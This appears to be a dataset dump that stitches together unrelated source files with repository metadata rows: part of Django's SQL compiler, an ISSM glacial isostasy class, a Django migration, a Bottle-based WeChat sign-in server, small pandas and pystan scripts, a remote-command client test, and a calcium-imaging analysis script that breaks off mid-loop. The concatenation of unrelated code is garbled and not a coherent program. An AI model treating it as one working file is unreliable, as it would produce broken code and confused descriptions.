if field is None:
# A field value of None means the value is raw.
sql, params = val, []
elif hasattr(val, 'as_sql'):
# This is an expression, let's compile it.
sql, params = self.compile(val)
elif hasattr(field, 'get_placeholder'):
# Some fields (e.g. geo fields) need special munging before
# they can be inserted.
sql, params = field.get_placeholder(val, self, self.connection), [val]
else:
# Return the common case for the placeholder
sql, params = '%s', [val]
# The following hook is only used by Oracle Spatial, which sometimes
# needs to yield 'NULL' and [] as its placeholder and params instead
# of '%s' and [None]. The 'NULL' placeholder is produced earlier by
# OracleOperations.get_geom_placeholder(). The following line removes
# the corresponding None parameter. See ticket #10888.
params = self.connection.ops.modify_insert_params(sql, params)
return sql, params
def prepare_value(self, field, value):
"""
Prepare a value to be used in a query by resolving it if it is an
expression and otherwise calling the field's get_db_prep_save().
"""
if hasattr(value, 'resolve_expression'):
value = value.resolve_expression(self.query, allow_joins=False, for_save=True)
# Don't allow values containing Col expressions. They refer to
# existing columns on a row, but in the case of insert the row
# doesn't exist yet.
if value.contains_column_references:
raise ValueError(
'Failed to insert expression "%s" on %s. F() expressions '
'can only be used to update, not to insert.' % (value, field)
)
if value.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if value.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
else:
value = field.get_db_prep_save(value, connection=self.connection)
return value
def pre_save_val(self, field, obj):
"""
Get the given field's value off the given obj. pre_save() is used for
things like auto_now on DateTimeField. Skip it if this is a raw query.
"""
if self.query.raw:
return getattr(obj, field.attname)
return field.pre_save(obj, add=True)
def assemble_as_sql(self, fields, value_rows):
"""
Take a sequence of N fields and a sequence of M rows of values, and
generate placeholder SQL and parameters for each field and value.
Return a pair containing:
* a sequence of M rows of N SQL placeholder strings, and
* a sequence of M rows of corresponding parameter values.
Each placeholder string may contain any number of '%s' interpolation
strings, and each parameter row will contain exactly as many params
as the total number of '%s's in the corresponding placeholder row.
"""
if not value_rows:
return [], []
# list of (sql, [params]) tuples for each object to be saved
# Shape: [n_objs][n_fields][2]
rows_of_fields_as_sql = (
(self.field_as_sql(field, v) for field, v in zip(fields, row))
for row in value_rows
)
# tuple like ([sqls], [[params]s]) for each object to be saved
# Shape: [n_objs][2][n_fields]
sql_and_param_pair_rows = (zip(*row) for row in rows_of_fields_as_sql)
# Extract separate lists for placeholders and params.
# Each of these has shape [n_objs][n_fields]
placeholder_rows, param_rows = zip(*sql_and_param_pair_rows)
# Params for each field are still lists, and need to be flattened.
param_rows = [[p for ps in row for p in ps] for row in param_rows]
return placeholder_rows, param_rows
def as_sql(self):
# We don't need quote_name_unless_alias() here, since these are all
# going to be column names (so we can avoid the extra overhead).
qn = self.connection.ops.quote_name
opts = self.query.get_meta()
result = ['INSERT INTO %s' % qn(opts.db_table)]
fields = self.query.fields or [opts.pk]
result.append('(%s)' % ', '.join(qn(f.column) for f in fields))
if self.query.fields:
value_rows = [
[self.prepare_value(field, self.pre_save_val(field, obj)) for field in fields]
for obj in self.query.objs
]
else:
# An empty object.
value_rows = [[self.connection.ops.pk_default_value()] for _ in self.query.objs]
fields = [None]
# Currently the backends just accept values when generating bulk
# queries and generate their own placeholders. Doing that isn't
# necessary and it should be possible to use placeholders and
# expressions in bulk inserts too.
can_bulk = (not self.return_id and self.connection.features.has_bulk_insert)
placeholder_rows, param_rows = self.assemble_as_sql(fields, value_rows)
if self.return_id and self.connection.features.can_return_id_from_insert:
if self.connection.features.can_return_ids_from_bulk_insert:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
params = param_rows
else:
result.append("VALUES (%s)" % ", ".join(placeholder_rows[0]))
params = [param_rows[0]]
col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
r_fmt, r_params = self.connection.ops.return_insert_id()
# Skip empty r_fmt to allow subclasses to customize behavior for
# 3rd party backends. Refs #19096.
if r_fmt:
result.append(r_fmt % col)
params += [r_params]
return [(" ".join(result), tuple(chain.from_iterable(params)))]
if can_bulk:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
return [(" ".join(result), tuple(p for ps in param_rows for p in ps))]
else:
return [
(" ".join(result + ["VALUES (%s)" % ", ".join(p)]), vals)
for p, vals in zip(placeholder_rows, param_rows)
]
def execute_sql(self, return_id=False):
assert not (
return_id and len(self.query.objs) != 1 and
not self.connection.features.can_return_ids_from_bulk_insert
)
self.return_id = return_id
with self.connection.cursor() as cursor:
for sql, params in self.as_sql():
cursor.execute(sql, params)
if not return_id:
return
if self.connection.features.can_return_ids_from_bulk_insert and len(self.query.objs) > 1:
return self.connection.ops.fetch_returned_insert_ids(cursor)
if self.connection.features.can_return_id_from_insert:
assert len(self.query.objs) == 1
return self.connection.ops.fetch_returned_insert_id(cursor)
return self.connection.ops.last_insert_id(
cursor, self.query.get_meta().db_table, self.query.get_meta().pk.column
)
class SQLDeleteCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
assert len([t for t in self.query.alias_map if self.query.alias_refcount[t] > 0]) == 1, \
"Can only delete from one table at a time."
qn = self.quote_name_unless_alias
result = ['DELETE FROM %s' % qn(self.query.base_table)]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(params)
class SQLUpdateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
self.pre_sql_setup()
if not self.query.values:
return '', ()
qn = self.quote_name_unless_alias
values, update_params = [], []
for field, model, val in self.query.values:
if hasattr(val, 'resolve_expression'):
val = val.resolve_expression(self.query, allow_joins=False, for_save=True)
if val.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if val.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
elif hasattr(val, 'prepare_database_save'):
if field.remote_field:
val = field.get_db_prep_save(
val.prepare_database_save(field),
connection=self.connection,
)
else:
raise TypeError(
"Tried to update field %s with a model instance, %r. "
"Use a value compatible with %s."
% (field, val, field.__class__.__name__)
)
else:
val = field.get_db_prep_save(val, connection=self.connection)
# Getting the placeholder for the field.
if hasattr(field, 'get_placeholder'):
placeholder = field.get_placeholder(val, self, self.connection)
else:
placeholder = '%s'
name = field.column
if hasattr(val, 'as_sql'):
sql, params = self.compile(val)
values.append('%s = %s' % (qn(name), placeholder % sql))
update_params.extend(params)
elif val is not None:
values.append('%s = %s' % (qn(name), placeholder))
update_params.append(val)
else:
values.append('%s = NULL' % qn(name))
table = self.query.base_table
result = [
'UPDATE %s SET' % qn(table),
', '.join(values),
]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(update_params + params)
def execute_sql(self, result_type):
"""
Execute the specified update. Return the number of rows affected by
the primary update query. The "primary update query" is the first
non-empty query that is executed. Row counts for any subsequent,
related queries are not available.
"""
cursor = super().execute_sql(result_type)
try:
rows = cursor.rowcount if cursor else 0
is_empty = cursor is None
finally:
if cursor:
cursor.close()
for query in self.query.get_related_updates():
aux_rows = query.get_compiler(self.using).execute_sql(result_type)
if is_empty and aux_rows:
rows = aux_rows
is_empty = False
return rows
def pre_sql_setup(self):
"""
If the update depends on results from other tables, munge the "where"
conditions to match the format required for (portable) SQL updates.
If multiple updates are required, pull out the id values to update at
this point so that they don't change as a result of the progressive
updates.
"""
refcounts_before = self.query.alias_refcount.copy()
# Ensure base table is in the query
self.query.get_initial_alias()
count = self.query.count_active_tables()
if not self.query.related_updates and count == 1:
return
query = self.query.chain(klass=Query)
query.select_related = False
query.clear_ordering(True)
query._extra = {}
query.select = []
query.add_fields([query.get_meta().pk.name])
super().pre_sql_setup()
must_pre_select = count > 1 and not self.connection.features.update_can_self_select
# Now we adjust the current query: reset the where clause and get rid
# of all the tables we don't need (since they're in the sub-select).
self.query.where = self.query.where_class()
if self.query.related_updates or must_pre_select:
# Either we're using the idents in multiple update queries (so
# don't want them to change), or the db backend doesn't support
# selecting from the updating table (e.g. MySQL).
idents = []
for rows in query.get_compiler(self.using).execute_sql(MULTI):
idents.extend(r[0] for r in rows)
self.query.add_filter(('pk__in', idents))
self.query.related_ids = idents
else:
# The fast path. Filters and updates in one query.
self.query.add_filter(('pk__in', query))
self.query.reset_refcounts(refcounts_before)
class SQLAggregateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
sql, params = [], []
for annotation in self.query.annotation_select.values():
ann_sql, ann_params = self.compile(annotation, select_format=FORCE)
sql.append(ann_sql)
params.extend(ann_params)
self.col_count = len(self.query.annotation_select)
sql = ', '.join(sql)
params = tuple(params)
sql = 'SELECT %s FROM (%s) subquery' % (sql, self.query.subquery)
params = params + self.query.sub_params
return sql, params
def cursor_iter(cursor, sentinel, col_count, itersize):
"""
Yield blocks of rows from a cursor and ensure the cursor is closed when
done.
"""
try:
for rows in iter((lambda: cursor.fetchmany(itersize)), sentinel):
yield rows if col_count is None else [r[:col_count] for r in rows]
finally:
cursor.close()
|
[
"[email protected]"
] | |
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966 | 2019-07-10T17:46:31 | 2019-07-10T17:46:31 | 105,887,661 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,277 |
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
"""
GIA class definition
Usage:
giaivins=giaivins();
"""
def __init__(self): # {{{
self.mantle_viscosity = float('NaN');
self.lithosphere_thickness = float('NaN');
self.cross_section_shape = 0;
#set defaults
self.setdefaultparameters()
#}}}
def __repr__(self): # {{{
string=' giaivins solution parameters:'
string="%s\n%s"%(string,fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
string="%s\n%s"%(string,fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
string="%s\n%s"%(string,fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
return string
#}}}
def extrude(self,md): # {{{
self.mantle_viscosity=project3d(md,'vector',self.mantle_viscosity,'type','node')
self.lithosphere_thickness=project3d(md,'vector',self.lithosphere_thickness,'type','node')
return self
#}}}
def setdefaultparameters(self): # {{{
self.cross_section_shape=1;
return self
#}}}
def checkconsistency(self,md,solution,analyses): # {{{
# Early return
if ('GiaAnalysis' not in analyses):
return md
md = checkfield(md,'fieldname','gia.mantle_viscosity','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.lithosphere_thickness','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])
#be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
#are not provided into the future.
return md
# }}}
def marshall(self,prefix,md,fid): # {{{
WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1);
WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.);
WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer');
# }}}
|
[
"[email protected]"
] | |
3db3cc00113a6fb614fa79bc5f0a9a2b4972075f
|
de17da755ea35e928afbaf48d41c23053e43af8a
|
/CourseSite/courses/migrations/0023_auto_20180426_1616.py
|
fa77713cabba30af89bec7958051af1a7c5157c2
|
[] |
no_license
|
m-gautam/Course_SIte-Project-
|
353aaec6695ca769cd16f38a0118ae4abc52bf9e
|
2b2cd1f3f4f85fec5c4b18355c111c67ce6dfcd0
|
refs/heads/master
| 2021-04-26T22:47:21.042398 | 2020-05-17T21:15:47 | 2020-05-17T21:15:47 | 124,147,812 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-26 16:16
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0022_auto_20180426_1615'),
]
operations = [
migrations.AlterField(
model_name='course',
name='prereq_courses',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), default='NULL', size=None),
),
]
|
[
"[email protected]"
] | |
ab2e70e575b38380a237025bcdbb447ce34fba5a
|
88eb514f6934c8b3e0a86f852f4202325a0546b7
|
/recepis/migrations/0002_rename_receitas_receita.py
|
a688a952255112952123cf68f9ae2fd4c30b680e
|
[] |
no_license
|
AllysonAbreu/projeto-pw
|
2859a90c4fbb75e26397e068327b1e7ad791f2a1
|
5e85935ccc6329d1234081541201cc6f0287741f
|
refs/heads/main
| 2023-09-01T05:02:31.127160 | 2021-09-16T23:08:58 | 2021-09-16T23:08:58 | 402,399,271 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 322 |
py
|
# Generated by Django 3.2.7 on 2021-09-02 17:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('recepis', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='Receitas',
new_name='Receita',
),
]
|
[
"Aoa3698741@_"
] |
Aoa3698741@_
|
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290 | 2023-05-10T20:12:10 | 2023-05-10T20:12:10 | 148,912,065 | 22 | 21 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
#pandasSeriesVsDataFrame.py
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
|
[
"[email protected]"
] | |
ba82f9b61b3eb06587fc5c2185adf9b9c041c8cf
|
bf33b8048d99eec4f693945d84f401ebe6083db2
|
/mybottle/sign/signup.py
|
d3f9f6c81e196105173160280a3cdb324ed8d510
|
[] |
no_license
|
yzhang3beatit/filesForServer
|
89f507937447511c12c6f9f35aa146b7619cbf42
|
eb7a551bc815c9f981ede01d058d9e0b6136971f
|
refs/heads/master
| 2021-01-19T05:10:50.982745 | 2016-07-21T06:28:50 | 2016-07-21T06:28:50 | 61,519,501 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,950 |
py
|
from bottle import route, run, request
import xml.etree.ElementTree as ET
from time import strftime, localtime, time, clock
from bisect import bisect_left
from xls.xls_record import get_records_from_xls, write_to_excel
mem_dir = '/home/y184zhan/tmp/'
readable = mem_dir+'xml_file.txt'
origin = mem_dir+'msg_file.txt'
KEYWORD = '1python'
def sec2str(secs):
return strftime("%Y-%m-%d %H:%M:%S", localtime(secs))
def parseXML(recvmsg):
# printToFile(recvmsg, origin, 'ba')
_str = byte2str(recvmsg)
# printToFile(_str, readable, 'a+')
root = ET.fromstring(_str)
msg = {}
for child in root:
if child.tag == 'CreateTime':
msg[child.tag] = sec2str(int(child.text))
else:
msg[child.tag] = child.text
return msg
textTpl = '''<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
</xml>'''
def printToFile(msg, filepath, flag):
f = open(filepath, flag)
f.write(msg)
f.close()
def byte2str(utfByte):
_str = utfByte.decode()
# print(_str)
return _str
@route('/', method='POST')
def index():
start = clock()
openid = request.query.openid
# print("OPENID in FORMS:", openid)
# for l in request.body:
# print(l)
msg = parseXML(request.body.read())
echostr = build_echostr(msg)
end = clock()
print('Running time: %fs' %(end - start))
return echostr
DATA = []
DATA_INDEX = []
def main():
global DATA
global DATA_INDEX
DATA = read_data_file()
DATA_INDEX = [x[0] for x in DATA]
def read_data_file():
filename = './sign_record.xls'
datalist = get_records_from_xls(filename, 'Clear')
return datalist
def build_echostr(msg):
content = msg['Content'].strip()
welcome = u"Welcome to Coach Workroom"
if content == "print" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !\n"
data_list = [x[4] for x in DATA]
len_ = len(data_list) - 2
names = ',\n'.join(data_list)
welcome += str(len_) + '\n'
welcome += names
elif content == "save" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !"
write_to_excel('result.xls', 'SIGN', len(DATA), 7, None, DATA)
elif content.lower() == 'update':
welcome = u"Please type in your ID\n(e.g. 10240148)"
update_data_clear(msg['FromUserName'])
elif KEYWORD in content:
user = update_data_sign(msg['FromUserName'], content, msg['CreateTime'])
if user: # user[4] == name:
if user[1]: # meno
welcome = u"%s, you have signed!" %user[4]
else:
welcome = u"Welcome to sign-in: %s" %user[4]
else:
welcome = u"Please type in Nokia ID:\n(e.g. 10240148)"
elif content.isdigit() and len(content) == 8:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
update_data_nokiaid(msg['FromUserName'], content)
elif is_name(content):
welcome = u"Please type in keyword to sign-in"
update_data_name(msg['FromUserName'], content)
else:
user = update_data_find(msg['FromUserName'])
if user: # user[4] == name
if not user[4]:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
elif user[1]: # user[1] == memo
welcome = u"%s, you have signed!" % user[4]
else:
welcome = u"%s, please type in keyword to sign" % user[4]
else:
welcome = u"Please sign up with your:\nNokiaID (e.g. 12345678)"
echostr = textTpl % (msg['FromUserName'], msg['ToUserName'], str(int(time())),
welcome)
# #print(DATA)
return echostr
def is_name(str_):
return str_.isalpha() and str_[0].isupper()
def update_data_clear(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
DATA[index][4] = ''
DATA[index][5] = ''
def update_data_find(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
return DATA[index]
def update_data_sign(openid, meno, timestamp):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', meno)
DATA[index][1] = meno
DATA[index][2] = timestamp
return DATA[index]
else:
new = [openid, meno, '', '', '', '', '']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
return
def update_data_name(openid, name):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', name)
if not DATA[index][4].strip():
DATA[index][4] = name
else:
new = [openid, '', '', '', name, '', ' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
def update_data_nokiaid(openid, nokiaid):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', nokiaid)
if not DATA[index][5].strip():
DATA[index][5] = nokiaid
else:
new = [openid, '', '', '', '', nokiaid,' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
'''
user = {'ID':msg['FromUserName'], 'Memo': msg['Content'], 'Name':msg['name'],
'Nokia ID':msg['nokiaid'], 'Department':msg['mdep'],
'TimeStamp':msg['CreateTime'], 'Sign':msg['Content']}
'''
if __name__ == "__main__":
main()
run(host='0.0.0.0', port=80)
|
[
"[email protected]"
] | |
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
| 2020-06-13T10:35:36.663668 | 2017-01-06T09:01:42 | 2017-01-06T09:01:42 | 75,392,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,335 |
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$',views.index_view),
url(r'^watres/',include(watres_url)),
url(r'^watstat/',include(watstat_url)),
]
if settings.DEBUG:
if settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += staticfiles_urlpatterns()
|
[
"[email protected]"
] | |
1cfd98dc3d88365f1d5b352e981615a2a6699195
|
cad76727b7e8f15abd7c65e9134f46c4e151f742
|
/Python/stan-irt.py
|
935b90138427857b3cf5d1d7800af1614b34ac80
|
[] |
no_license
|
AMBrown0/DataVizAss02
|
258e3b9d2f38791edf69dfcc9f78dc13400df256
|
22dcf219990540df9835d148f6c6c1219ad8aa15
|
refs/heads/main
| 2023-03-19T17:47:34.186892 | 2021-03-12T10:15:17 | 2021-03-12T10:15:17 | 276,904,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,085 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 12:07:25 2021
@author: andy
"""
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
import pandas as pd
import os
import glob
import shutil
import pandas as pd
from pathlib import Path
import re
import matplotlib.pyplot as plt
import numpy as np
import math
from datetime import datetime
from os import path
from docx import Document
from sklearn.linear_model import LinearRegression
#LDA Imports
import gensim
import nltk
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
from gensim import corpora, models
from pprint import pprint
np.random.seed(2018)
#nltk.download('wordnet')
#plot
import matplotlib.pyplot as plt
import seaborn as sns
#Lexicon sentiment analysis
from afinn import Afinn
from textblob import TextBlob
import pandas as pd
from pprint import pprint
import pystan
from scipy.special import expit
from matplotlib import pyplot as plt
from numpy.random import normal, randint, binomial, choice
from numpy import percentile, concatenate, array, linspace, append
#%matplotlib inline
from sklearn.metrics import r2_score
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
binary_irt_model = pystan.StanModel(file="binary_irt.stan")
|
[
"[email protected]"
] | |
7ccca3ee25e9eb35c488266d7448ee7645100a6d
|
9ae680db168db40ae8feae0dc9cb42dacabbd012
|
/functest.py
|
9aa06fc03d61aa5f6d9c42e005721d6c117b51c7
|
[] |
no_license
|
tonysimpson/pyras
|
5ed4ec212b916ecb5eb3b9db8e05b43d585bb8a8
|
defbddffa04aa50c108138a63c3dd76957615994
|
refs/heads/master
| 2021-01-18T13:54:55.572472 | 2014-06-13T09:12:53 | 2014-06-13T09:12:53 | 5,888,372 | 1 | 0 | null | 2014-06-13T09:10:21 | 2012-09-20T15:07:52 |
Python
|
UTF-8
|
Python
| false | false | 1,078 |
py
|
# use ipython -i functest.py
import pyras
client = pyras.RemoteCommandClient('127.0.0.1')
print client.info()
client.register('echo "Hello"')
print client.info()
client.start(1)
client.register('while true; do echo "oh no!"; done')
print client.info()
client.start(2)
print client.info()
client.stop(2)
client.run('echo "hello"')
client.unregister(2)
print client.info()
client.register('echo "1"', 'group1')
client.register('echo "2"', 'group1')
client.register('echo "3"', 'group1')
client.register('echo "4"', 'group1')
client.register('echo "5"', 'group1')
client.register('echo "6"', 'group1')
client.register('echo "7"', 'group1')
print client.info()
client.start_group('group1')
client.register('echo "8"', 'group1')
client.register('echo "9"', 'group1')
client.stop_group('group1')
client.start_group('group1')
print client.info()
print client.read('README.md', 0, 20)
print client.read_end('README.md', 20)
cid = client.register(r'for i in `seq 4`; do (while true; do echo $i; done &) ; done')
client.start(cid)
print client.info()
client.stop(cid)
print client.info()
|
[
"[email protected]"
] | |
aa2900526f8aa579b7ea48f1111b139ef3a08d84
|
ea96439b3fe8745e06875aa8913d487c2715d2fc
|
/NeuroAnalysisTools/scripts/analysis_database/0150_plot_ori_vs_rf_axis_DS.py
|
bb4e8680d69bc7cc65c1d6de2cc656954ee14eb7
|
[] |
no_license
|
zhuangjun1981/NeuroAnalysisTools
|
00561ddd1ee8339b5c2c7ab5d7318ac207460c5c
|
0c7acdb745ef93e009ec538af11252e743f9d430
|
refs/heads/master
| 2022-07-18T05:55:22.200409 | 2022-07-07T23:01:29 | 2022-07-07T23:01:29 | 226,148,154 | 14 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,877 |
py
|
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import NeuroAnalysisTools.SingleCellAnalysis as sca
import scipy.stats as stats
import h5py
# df_path = r"G:\bulk_LGN_database\dataframe_190530171338.csv"
# rf_maps_folder = r"intermediate_results\rf_maps_dataframes_190529210731"
df_path = r"G:\bulk_LGN_database\dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30.csv"
rf_maps_folder = r"G:\bulk_LGN_database\intermediate_results" \
r"\rf_maps_dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30"
depths = [50, 100, 150, 200, 250, 300, 350, 400,]
mouse_ids = ['M360495', 'M376019', 'M386444', 'M426525', 'M439939', 'M439943']
# mouse_ids = ['M439939']
dire_type = 'peak_dire' # 'vs_dire' or 'peak_dire'
response_dir = 'pos'
response_type = 'dff'
post_process_type = 'ele' # 'raw', 'ele' or 'rec'
skew_thr = 0.6
dgc_peak_z_thr = 3.
dgc_p_anova_thr = 0.01
dsi_type = 'gdsi'
dsi_thr = 0.5
osi_type = 'gosi'
osi_thr = 1. / 3.
ellipse_aspect_thr = 1.0
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
if dire_type == 'peak_dire' and (post_process_type == 'ele' or post_process_type == 'rec'):
dire_pp = 'raw'
else:
dire_pp = post_process_type
print('loading csv file: {}'.format(df_path))
df = pd.read_csv(df_path)
print('csv file loaded.')
df = df[(df['mouse_id'].isin(mouse_ids)) & \
(df['skew_fil'] >= skew_thr) & \
(df['dgc_{}_peak_z'.format(response_dir)] >= dgc_peak_z_thr) & \
(df['dgc_p_anova_{}'.format(response_type)] <= dgc_p_anova_thr) & \
(np.isfinite(df['rf_{}_on_peak_z'.format(response_dir)]))]
dsdf = df[(df['dgc_{}_{}_{}_{}'.format(response_dir, dsi_type, post_process_type, response_type)] >= dsi_thr)]
ds_diff_onoff = []
ds_diff_on = []
ds_diff_off = []
for roi_i, roi_row in dsdf.iterrows():
date = int(roi_row['date'])
mid = roi_row['mouse_id']
plane_n = roi_row['plane_n']
roi_n = roi_row['roi_n']
map_fn = '{}_{}_{}_{}'.format(date, mid, plane_n, response_dir)
map_f = h5py.File(os.path.join(rf_maps_folder, map_fn + '.hdf5'), 'r')
on_grp = map_f['{}_ON'.format(map_fn)]
off_grp = map_f['{}_OFF'.format(map_fn)]
dire = roi_row['dgc_{}_{}_{}_{}'.format(response_dir, dire_type, dire_pp, response_type)]
ori = sca.dire2ori(dire)
if roi_n in on_grp.keys() and roi_n in off_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
c_alt_on, c_azi_on = rf_on.get_weighted_rf_center()
c_alt_off, c_azi_off = rf_off.get_weighted_rf_center()
onoff_ang = np.arctan((c_alt_on - c_alt_off) / (c_azi_on - c_azi_off))
onoff_ang = onoff_ang * 180. / np.pi
onoff_ang = sca.dire2ori(onoff_ang)
curr_diff = abs(onoff_ang - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_onoff.append(curr_diff)
elif roi_n in on_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
ell_on = rf_on.ellipse_fitting(is_plot=False)
if ell_on is not None and ell_on.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_on.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
